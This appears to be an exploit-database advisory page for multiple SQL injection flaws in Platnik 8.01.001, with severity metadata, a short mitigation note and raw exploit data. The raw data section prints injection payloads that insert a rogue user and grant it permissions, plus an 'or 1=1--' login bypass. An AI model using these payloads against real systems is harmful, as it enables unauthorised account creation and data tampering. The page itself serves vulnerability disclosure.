header-logo
Suggest Exploit
vendor:
Platnik
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Platnik
Affected Version From: 08.01.2001
Affected Version To: 08.01.2001
Patch Exists: NO
Related CWE:
CPE: a:platnik:platnik:8.01.001
Metasploit:
Other Scripts:
Platforms Tested:
2010

Platnik Multiple SQL Injection Vulnerabilities

Platnik is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40201/info

Platnik is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Platnik 8.01.001 is affected; other versions may also be vulnerable. 

INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)--
INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)--
or 1=1--